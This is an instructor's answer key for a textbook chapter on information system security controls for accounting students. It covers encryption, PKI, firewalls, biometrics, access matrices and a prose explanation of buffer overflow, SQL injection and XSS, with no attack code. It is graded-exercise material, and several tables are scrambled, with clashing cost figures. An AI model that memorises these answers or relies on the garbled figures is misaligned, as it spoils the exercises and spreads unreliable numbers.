Accounting Information Systems

CHAPTER 7 INFORMATION SYSTEM CONTROLS for SYSTEMS RELIABILITY

SUGGESTED ANSWERS TO DISCUSSION QUESTIONS 7.1 Encryption is the final layer of preventative controls in that encrypting data provides a barrier against an intruder who has obtained access to company data. Encryption employing a digital signature and a public key infrastructure (PKI) can also strengthen authentication procedures and helps to ensure and verify the validity of e-business transactions. The digital signature is some sort of identifying information about the signer that is encrypted with the signers private key. This identifying information can only be decrypted using the corresponding public key. Since a private key is only known to its owner, only the owner can hold both the public and the private key and be the creator of the digital signature. Thus, digital signatures can be used to authenticate a particular party involved in a transaction as being the creator of a document. This provides for nonrepudiation: the creator of the digital signature cannot deny having signed a document.. A digital certificate is an electronic document that is digitally signed by a trusted third party that certifies the identity of the owner of a pair of public and private keys. The PKI is a system that is used to process and manage the public and private keys used in digital signatures and digital certificates. An organization that handles digital certificates is called a certificate authority.
1.

2. The effectiveness of control procedures depends on how well employees understand and follow the organizations security policies. If all employees are taught proper security measures and taught to follow safe computing practices, such as never opening unsolicited email attachments, using only approved software, not sharing or revealing passwords, and taking steps to physically protect laptops, company-wide security will increase. 3. Firewalls use hardware and software to block unauthorized access to the companys system. 4. A intrusion detection system (IDS) create logs of network traffic that was permitted to pass the firewall and then analyze those logs for signs of attempted or successful intrusions This provides a means to monitor the number of attempted intrusions successfully blocked by the firewall, and can provide early warning signals that the organization is being targeted. 5. A virtual private network (VPN) is a network that controls access to a companys extranet by using encryption, identification, and authentication tools and techniques. (Definition from the texts glossary, p.794, 10th ed.)
7-1
2009 Pearson Education, Inc. Publishing as Prentice Hall

Ch. 7: Information System Controls for Systems Reliability

Additional facts: A virtual private network (VPN) increases system reliability by encrypting data prior to sending it over the Internet. The data is then decrypted once it arrives at its intended destination. Thus, a private network is created using the Internet as the network connection and encryption as the method to make it private and secure the data from public disclosure.

7.2 Having the person responsible for information security report directly to the Chief Information Officer (CIO) raises the visibility and therefore the importance of information security to all levels of management and to the company at large. Security must be recognized as a top management issue, having the information security officer report to a member of the executive committed such as the CIO, formalizes information security as a top management issue. One potential disadvantage is that the CIO may not always react favorably to reports indicating that shortcuts have been taken with regard to security, especially in situations where following the recommendations for increased security spending could result in failure to meet budgeted goals. Thus, just as the effectiveness of the internal audit function is improved by having it report to someone other than the CFO, the security function may also be more effective if it reports to someone who does not have responsibility for information systems operations.

7.3

The most effective auditor is a person who has training and experience as an auditor and training and experience as an information systems or computer specialist. However, few people have such an extensive background, and personnel training and development are both expensive and time consuming. So, many organizations may find it necessary to accept some tradeoffs in staffing the Information Systems audit function. Since auditors generally work in teams, one common solution is to include members who have computer training and experience. Then, as audit teams are created for specific purposes, care should be taken to ensure that the members of each audit team have an appropriate mix of skills and experience. However, in todays technological age, all internal and external auditors on an audit engagement team must have a sound understanding of basic information security concepts so that during the course of an audit, they would be able to identify, report, and communicate security risks and exposures to the security specialists on the audit team for further assessment and investigation.

7.4

To provide absolute information security an organization must follow Jeff Richards Laws of Data Security. 1. Dont buy a computer 2. If you buy a computer, dont turn it on.
7-2
2009 Pearson Education, Inc. Publishing as Prentice Hall

Accounting Information Systems

As this humorous solution indicates, there is no way to make a system absolutely secure. However, as discussed in the text, there are numerous methods to make a system more secure. 7.5 Penetration testing provides a rigorous way to test the effectiveness of an organizations computer security by attempting to break into the organizations information system. Internal audit and external security consulting team perform penetration tests in which they try to compromise a companys system. Some outside consultants claim that they can get into 90 percent or more of the companies they attack. This is not surprising, given that it is impossible to achieve 100% security. Thus, one limitation of penetration testing is that it almost always shows that there are ways to break into the system. The more important analysis, however, is evaluating how difficult it was to break in and the costeffectiveness of alternative methods for increasing that level of difficulty. Another limitation is that failure to break in may be due to lack of skill by the tester. Finally, penetration testing typically focuses on unauthorized access by outsiders; thus, it does not test for security breaches from internal sources.

7.6

Top management support is always essential for the success of any program an entity undertakes. Thus, top management support and participation in security awareness training is essential to maximize its impact on the employees and managers of the firm. Effective instruction and hands-on active learning techniques will also help to maximize training. Many employees have extensive experience and/or expertise in security, these employees should be involved in the design and execution of the security training. Real life example should be used throughout the training so that employs can view or at least visualize the exposures and threats they face as well as the controls in place to address the exposures and threats. Role-playing has been shown to be an effective method to maximize security awareness training especially with regard to social engineering attack training. The total quality movement focuses on continuous improvement and the elimination of errors. Security, like quality, is a moving target which can always be improved. Another similarity is the need for active top management support. The focus on quality only began to achieve momentum when top management supported the up-front investment costs to improve quality and refused to accept the argument that the benefits of further improvements in quality did not justify the costs required to attain them. Similarly, top management needs to actively support the goal of ever-improving levels of security and the investment necessary to achieve that result. What are the advantages and disadvantages of biometric security devices, such as fingerprint readers, in comparison with other security measures such as passwords and locked doors?
7-3
2009 Pearson Education, Inc. Publishing as Prentice Hall

7.7

7.8

Ch. 7: Information System Controls for Systems Reliability

The advantages of biometric security devices include: Providing security advantages over traditional methods because physical traits are almost impossible to duplicate. Ease of use. Cannot be forgotten like passwords and user ids. Cannot be left at home, in a rental car, or in a taxi. Cannot be inadvertently lost or stolen.

Nonbiometric access methods such as passwords and keys can be stolen and used by others, lost, or forgotten. It is easier for someone else to get access to tokens, smart cards, or passwords and use them to gain entry to the system. As such, the greatest advantage of biometric devices is that they ARE the person and so cannot be lost, stolen, or forgotten. Drawbacks to such devices include: Limited flexibility in responding to changes in the physically measured features. Such common problems as laryngitis, eye infections, and cut fingers alter physical features temporarily. Non-revocability. If a password is guessed, a new one can be issued. Likewise, if a token is lost or stolen, a new one can be issued. However, if biometric template is compromised, it cannot be re-issued (e.g., you cannot assign someone a new fingerprint). Thus, secure storage of the template is crucial. Users may not accept certain types of biometric methods. For example, in some cultures, fingerprints may have negative connotations that preclude their widespread use for authentication.

7-4
2009 Pearson Education, Inc. Publishing as Prentice Hall

Accounting Information Systems

SUGGESTED SOLUTIONS TO THE PROBLEMS 7.1 a. Students An employees laptop was stolen at the airport. The laptop contained personally identifying information about the companys customers that could potentially be used to commit identity theft. Solution: Encrypt data stored on company laptops. b. A salesperson successfully logged into the payroll system by guessing the payroll supervisors password. Solution: Employ and enforce strong password techniques such as at least an 8 character length, multiple character types, random characters, changed frequently. Also lock out accounts after 3-5 unsuccessful login attempts. c. A criminal remotely accessed a sensitive database using the authentication credentials (user ID and strong password) of an IT manager. At the time the attack occurred, the IT manager was logged into the system at his workstation at company headquarters. Solution: Integrate physical and logical security. In this case, the system should reject any attempts any user to remotely log into the system if that same user is already logged in from a physical workstation. The system should also notify appropriate security staff about such an incident. d. An employee received an email purporting to be from her boss informing her of an important new attendance policy. When she clicked on a link embedded in the email to view the new policy, she infected her laptop with a keystroke logger. Solution: Security awareness training is the best way to prevent such problems. Employees should be taught that this is a common example of a sophisticated phishing scam. Detective and corrective controls include employing anti-spyware software that automatically checks and cleans all detected spyware on an employee's computer as part of the logon process for accessing a company's information system. e. The director of R&D quit abruptly after an argument with the CEO. The company cannot access any of the files about several new projects because the R&D director had encrypted them before leaving. Solution: Employ a policy that files can only be encrypted using company encryption software and where IT security has access to the encryption keys through some form of key escrow. Internal Audit should test encrypted files and encryption keys.

7-5
2009 Pearson Education, Inc. Publishing as Prentice Hall

Ch. 7: Information System Controls for Systems Reliability

f. A company wrote custom code for the shopping cart feature on its web site. The code contained a buffer overflow vulnerability that could be exploited when the customer typed in the ship-to address. Solution: Teach programmers secure programming practices, including the need to carefully check all user input. It is also important for management to support the commitment to secure coding practices, even if that means a delay in completing, testing, and deploying new programs. Useful detective controls include to make sure programs are thoroughly tested before being put into use and to have internal auditors routinely test in-house developed software.

g. A company purchased the leading off-the-shelf e-commerce software for linking its electronic storefront to its inventory database. A customer discovered a way to directly access the back-end database by entering appropriate SQL code. Solution: Insist on secure code as part of the specifications for purchasing any 3rd party software. Thoroughly test the software prior to use. Employ a patch management program so that any vendor provided fixes and patches are immediately implemented. h. Attackers broke into the companys information system through a wireless access point located in one of its retail stores. The wireless access point had been purchased and installed by the store manager without informing central IT or security. Solution: Enact a policy that forbids any implementation of unauthorized wireless access points. Conduct routine audits for unauthorized or rouge wireless access points. i. An employee picked up a USB drive in the parking lot and plugged it into their laptop to see what was on it, which resulted in a keystroke logger being installed on that laptop. Solution: The best preventive control is security awareness training. Teach employees to never insert USB drives unless they are absolutely certain of their source. In addition, employ anti-spyware software that automatically checks and cleans all detected spyware on an employee's computer as part of the logon process for accessing a company's information system. j. A competitor intercepted the companys bid for a lucrative contract that was emailed to the local governments web site. The competitor used the information contained in the email to successfully underbid and win the contract. Solution: Encrypt sensitive files sent via email. Send sensitive files over a secure channel.

7-6
2009 Pearson Education, Inc. Publishing as Prentice Hall

Accounting Information Systems

k. When an earthquake destroyed the companys main data center, the CIO spent half a day trying to figure out who in the organization needed to be contacted in order to implement the companys cold site agreement. Solution: Implement and document emergency response procedures. Periodic testing would likely uncover any such problems prior to an actual disaster. l. Although logging was enabled, the information security staff did not review the logs early enough to detect and stop an attack that resulted in the theft of information about a new strategic initiative. Solution: Implement and enforce log review and analysis policies by proper management oversight of the information security staff or contract with a security information management service to perform such analysis. m. To facilitate working from home, an employee installed a modem on his office workstation. An attacker successfully penetrated the companys system by dialing into that modem. Solution: Routinely check for unauthorized or rouge modems by dialing all telephone numbers assigned to the company and identifying those connected to modems. n. An attacker gained access to the companys internal network by installing a wireless access point in a wiring closet located next to the elevators on the fourth floor of a highrise office building that the company shared with seven other companies. Solution: Secure or lock all wiring closets. Require strong authentication of all attempts to log into the system from a wireless client. Employ an intrusion detection system. 7.2 Solution: The article in the Journal of Accountancy is very well written and the instructions are easy to follow. If students follow the instructions they will have no problem completing the problem and will learn a new tool for Excel. It is expected that the instructor will familiarized themselves with the article prior to grading the assignment; however, the following are some screenshot of what the instructor may expect from student submissions. Part b.

7-7
2009 Pearson Education, Inc. Publishing as Prentice Hall

Ch. 7: Information System Controls for Systems Reliability

7-8
2009 Pearson Education, Inc. Publishing as Prentice Hall

Accounting Information Systems

Part c., sub-parts : a. password to open, b. password to modify, c. apply password to individual sheets, e. set workbook to be Read-only

7-9
2009 Pearson Education, Inc. Publishing as Prentice Hall

Ch. 7: Information System Controls for Systems Reliability

Part c sub-part d. Encrypt the data

7-10
2009 Pearson Education, Inc. Publishing as Prentice Hall

Accounting Information Systems

7-11
2009 Pearson Education, Inc. Publishing as Prentice Hall

Ch. 7: Information System Controls for Systems Reliability

Part c sub-part f-1 protect cells.

7-12
2009 Pearson Education, Inc. Publishing as Prentice Hall

Accounting Information Systems

Part c sub-part f-2 protect sheet.

7-13
2009 Pearson Education, Inc. Publishing as Prentice Hall

Ch. 7: Information System Controls for Systems Reliability

7.3

a. Access control matrix:

System User Salesperson Inventory Control Analyst Payroll Analyst Human Resources Manager Payroll Programmer Inventory Programmer Data Processing Manager Data Security Administrator

Payroll Program 0 0 0 0 3 0 1 3

Inventory Update Program 0 0 0 0 0 3 1 3

Payroll Master File 0 0 2 3 1 0 1 3

Inventor y Master File 1 3 0 0 0 1 1 3

System Log Files 0 0 0 0 1 1 1 3

Codes for type of access: 0 = No Access Permitted. 1 = Read and Display Only. 2 = Read, Display, and Update. 3 = Read, Display, Update, Create, and Delete. b. Inventory control analyst. Should not have create and delete rights to the inventory file. This analyst should only have read, display, and update rights to the inventory program. Payroll analyst. Should not have create and delete rights to the payroll file. This analyst should only have read, display, and update rights to the payroll program. Human resources manager. Should only have read, display, and update rights to the payroll file.

7.4

The Microsoft Baseline Security Analyzer (MBSA) allows users to scan a computer for
7-14
2009 Pearson Education, Inc. Publishing as Prentice Hall

Accounting Information Systems

common security misconfigurations. MBSA will scan the operating system and other installed components, such as Internet Information Services (IIS) and SQL Server, for security misconfigurations and whether or not they are up-to-date with respect to recommended security updates. Grading depends upon instructors judgment about the quality of the report. The MBSA will provide a list of weaknesses and how to correct those weaknesses.

7.5

Grading depends upon instructors judgment about the quality of the report; however, the students report should contain the students perspective on how these websites promote computer security and controls. The SANS Institute (www.sans.org) is basically commercial site selling security training. However, the site does contain over 1500 white papers on computer security that are divided into 71 different categories that range from Acceptable Use to Work Monitoring. Students should be able to find articles on almost any topic of interest to them about auditing. The National Security Agency (www.nsa.gov) is a governmental website that explains and promotes the National Security Agency. Of interest to auditors is their work on data security. The work that is publicly available can be accessed from their Research link which lists their published scholarly work and work presented at conferences. Many articles deal with software, data, and systems security. The Information Systems Audit and Control Association (www.isaca.org) is a very extensive source of information for the auditor. Just about anything on this website would be of use to an auditor depending on their level of experience and responsibility. Since this website is so extensive, instructors may want to recommend that students limit this portion of their report to three areas of student interest on the web site. The Information Systems Security Association (www.issa.org) is the website for a professional organization on security. Students will find Whitepapers and Webcasts on all security topics of general and specific interest. The draw back for this website is that access is limited to members. There is a student membership available for $30 and free 90 day trial membership. Students will have to join the organization as a student or trial membership to gain access to the information contained in the website. CERT (www.cert.org) is the website for the Carnegie Mellon University Software Engineering Institute (SEI). The website is a good resource for information about software assurance, secure systems, organizational security, and coordinated response. The resources available are extensive, but they are also written for academics, so they
7-15
2009 Pearson Education, Inc. Publishing as Prentice Hall

Ch. 7: Information System Controls for Systems Reliability

may be a little deep for some students who have little experience with programming.

The American Instituted of Certified Public Accountants (www.aicpa.org) is an excellent website for information pertinent to auditors. Students may access the website and the associated journal articles that target professionals. Students will have an easier time accessing and reading the information contained in this website since the target audience is accounting professionals. The National Institute of Standards (www.nist.gov) is a government sponsored website. The Computer Security Division is the link within the site that is of the greatest interest and use for accounting students. It contains a great deal of information on computer security. The Computer Crime and Intellectual Property Section of the U.S. Department of Justice (www.cybercrime.gov) is another government website that provides information related to cyber crime in form of news releases and cases. The case summaries located in the news releases will be of the most use to the students.

7.6

Grading depends upon instructors judgment about the quality of the report. Beware that although the Center for Internet Security does not charge for their benchmarking software downloads, they do require that the student register with their organization. Some students may object to this. In addition, it is unlikely that a lab administrator will allow students to download any software to lab hardware. a. XYZ Company is secure under their best case scenario but they do not meet security requirements under their worst case scenario. P = 25 Minutes D = 5 Minutes (Best Case) 10 Minutes (Worst Case) C = 6 Minutes (Best Case), 20 minutes (Worst Case) Time-base model: P > D + C Best Case Scenario P is greater than D + C (25 > 5 + 6) Worst Case Scenario P is less than D + C (25 < 10 + 20) From the Best/Worst Case Table below it is apparent that all the current arrangement and all of the investment options meet security requirements under the best and worst case scenario with the exception of the worst case scenario for the current condition where the penetration time is less than the detection and the correction time added together. In addition, each investment option does meet security requirements under the best and worst case scenarios. The Best Case Table and the Worst Case Tables show the cost per minute of the current situation, the three investment options, and the three investment
7-16
2009 Pearson Education, Inc. Publishing as Prentice Hall

7.7

Accounting Information Systems

options combined. The table shows that option 1 would be the most cost effective option at $2,083 per minute. If XYZ chose to invest in all three options, it would also meet the security requirements for the best and worst case scenarios, but the cost would be $150,000. Analyze & Correct Penetratio n 25 25 Total Time 11 30 Detection 5 10 Best Case 6 Analyze & Correct Worst Case 20

Best/Worst Case Table Cost Differential Current $0 $0 Option 1

> <

$50,000 $50,000

35 35

> >

11 30

5 10

6 20

Option 2

$40,000 $40,000

25 25

> >

7 24

1 4

6 20

Option 3

$25,000 $25,000

25 25

> >

9 20

5 10

4 10

Best Case Table Cost Differential $0 Penetratio n 25 Total Time 11 Time Differential 14 Cost/minute Cost / Time Differential $0

Current

>

Option 1 Option 2 Option 3

$50,000

35

>

11

24

$2,083

$40,000

25

>

18

$2,222

$60,000

25

>

16

$3,750

Combin ed

$150,000

35
7-17

>

30

$5,000

2009 Pearson Education, Inc. Publishing as Prentice Hall

Ch. 7: Information System Controls for Systems Reliability

Worst Case Table Cost Differential $0 Penetratio n 25 Total Time 30 Time Differential -5 Cost/minute Cost / Time Differential $0

Current

<

Option 1 Option 2 Option 3

$50,000

35

>

30

$10,000

$40,000

25

>

24

$40,000

$60,000

25

>

20

$12,000

Combin ed

$150,000

35

>

14

21

$7,143

7-18
2009 Pearson Education, Inc. Publishing as Prentice Hall

Accounting Information Systems

7.8 To encrypt a file or folder: 1. Open Windows Explorer. 2. Right-click the file or folder that you want to encrypt, and then click Properties. 3. On the General tab, click Advanced. 4. Select the Encrypt contents to secure data check box. To create new user accounts: 1. Click Start, Control Panel, double click User Accounts, follow prompts for User Account Creation Wizard. To create/change the password, double click on new user account icon, select Change The Password menu option and follow the prompts. a. Actions that can be performed using the new User Account 1. 2. 3. 4. 5. 6. 7. 8. Open the file - No Copy the file to another location on the hard drive - No Copy the file to a USB drive No Move the file to another location on the hard drive Yes Move the file to a USB drive No Rename the file - Yes Delete the file Yes Restore the deleted file and open it No, still cannot open a restored file

b. Actions that can be performed by Account that encrypted the file 9. Everything. However, you are prompted when trying to copy or move it to a USB device that performing that action will create an unencrypted copy of the file. 7.9 Solution: (Solutions will vary from student to student and institution to institution) # Description Password length (maximum and minimum) Types of characters Frequency of mandatory changes Password history (can an old password be used again)

a. Your school's network b. Your school's email system

7-19
2009 Pearson Education, Inc. Publishing as Prentice Hall

Ch. 7: Information System Controls for Systems Reliability

c. Your personal email account d. Your financial institution Explanations of the reason for any differences should focus on the relative value/importance of the data contained in each system.

7.10 Solution: Reports will vary from student to student; however, the reports should contain at least some of the following basic facts gathered from the text, cgisecurity.net, and wikipedia:

a. Buffer overflows One of the more common input-related vulnerability is what is referred to as a buffer overflow attack, in which an attacker sends a program more data than it can handle. Buffer overflows may cause the system to crash or, even worse, may provide a command prompt, thereby giving the attacker full administrative privileges, and control, of the device. Because buffer overflows are so common, it is instructive to understand how they work. Most programs are loaded into RAM when they run. Oftentimes a program may need to temporarily pause and call another program to perform a specific function. Information about the current state of the suspended program, such as the values of any variables and the address in RAM of the instruction to execute next when resuming the program, must be stored in RAM. The address to go to find the next instruction when the subprogram has finished its task is written to an area of RAM called the stack. The other information is written into an adjoining area of RAM called a buffer. A buffer overflow occurs when too much data is sent to the buffer, so that the instruction address in the stack is overwritten. The program will then return control to the address pointed to in the stack. In a buffer overflow attack, the input is designed so that the instruction address in the stack points back to a memory address in the buffer itself. Since the buffer has been filled with data sent by the attacker, this location contains commands that enable the attacker take control of the system. Note that buffer overflows can only occur if the programmer failed to include a check on the amount of data being input. Thus, sound programming practices can prevent buffer overflow attacks. Therefore, internal auditors should routinely test all applications developed in-house to be sure that they are not vulnerable to buffer overflow attacks.

b. SQL injection Many web pages receive an input or a request from web users and then to address the input or the request, they create a Structured Query Language (SQL) query for the database that is
7-20
2009 Pearson Education, Inc. Publishing as Prentice Hall

Accounting Information Systems

accessed by the webpage. For example, when a user logs into a webpage, the user name and password will be used to query the database to determine if they are a valid user. With SQL injection, it is possible to send a specially crafted user name and password that will change the SQL query into something else; i.e. inject something new into the SQL query and thereby bypass the authentication controls and effectively gain access to the database. This can allow a hacker to not only steal data from the database, but also modify and delete data or the entire database. c. Cross-site scripting Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will most likely click on this link from another website, instant message, or simply just reading a web board or email message. Usually the attacker will encode the malicious portion of the link to the site so the request is less suspicious looking to the user when clicked on. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner to make it appear as valid content from the website. Many popular guestbook and forum programs allow users to submit posts with html and javascript embedded in them. If for example I was logged in as "john" and read a message by "joe" that contained malicious javascript in it, then it may be possible for "joe" to hijack my session just by reading his bulletin board post.

7.11 Depending on the sensitivity and value of the data processed and stored at a data center, all of the 19 methods could be used by a corporation. For example, IBM is extremely concerned about the loss of data and trade secrets due to disasters and corporate espionage and employs all 19 methods; however, most corporations do not employ all 19 methods. Thus, the following solution is an approximation of the methods that a typical corporation may employ and the more extensive methods that a financial institution would choose. The methods that any corporation would also be employed at financial institutions, but are not checked to more clearly highlight the differences. Method Any Corporation
7-21
2009 Pearson Education, Inc. Publishing as Prentice Hall

Extra methods justified at a Financial Institution

1. 2. 3. 4.

Build on the right spot Have redundant utilities Pay attention to walls Avoid windows

Ch. 7: Information System Controls for Systems Reliability

5. Use landscaping for protection 6. Keep a 100-foot buffer zone around the site 7. Use retractable crash barriers at vehicle entry points 8. Plan for bomb detection 9. Limit entry points 10. Make fire doors exit only 11. Use plenty of cameras 12. Protect the buildings machinery 13. Plan for secure air handling 14. Ensure nothing can hid in the walls and ceilings 15. Use two-factor authentication 16. Harden the core with security layers 17. Watch the exits too 18. Prohibit food in the computer rooms 19. Install visitor restrooms

SUGGESTED SOLUTIONS TO THE CASES 7-1 Solution: Reports will vary from student to student, but the table below identifies corporategrade firewalls that may or may not be included in student reports. Name SonicGuard Pro 5060 Cost $9,371 Filtering Capability Deep packet & Web content Other Security Features IPSec VPN, layered anti-virus, anti-spyware, intrusion prevention Deep IPSec VPN, packet, Web layered anti-virus, content, anti-spyware, stateful intrusion inspection prevention, antispam Deep IPSec VPN,
7-22
2009 Pearson Education, Inc. Publishing as Prentice Hall

Fortinet 1000A

$24,745

Ease of Configuration Complex Professional network administrator needed Complex Professional network administrator needed Complex -

Ease of Use Complex Professional network administrator needed Complex Professional network administrator needed Complex -

Barracuda

$28,500

Accounting Information Systems

910

packet, Web content, stateful inspection $14,995 Dynamic packet filtering, stateful inspection

SunScreen Secure Net 3.1

layered anti-virus, anti-spyware, intrusion prevention, antispam VPN

Professional network administrator needed Complex Professional network administrator needed

Professional network administrator needed Complex Professional network administrator needed

. 7-2 The answers to this case will vary by student. Make sure that the student prepares questions for preventative, detective, and corrective controls with appropriate subcategories for each topic and questions that can be answered with a yes, no, or not applicable. For example, under the heading of preventive controls, there should be questions about the existence of various authentication methods, an access control matrix, training, physical access controls, firewalls, wireless access, host and application hardening, and encryption. Questions should be objective and focus on the existence of specific controls that the text suggests should be in place, such as The main firewall employs stateful packet inspection. In this way, yes answers are evidence that security is effective, whereas no answers are evidence of potential security vulnerabilities.

7-23
2009 Pearson Education, Inc. Publishing as Prentice Hall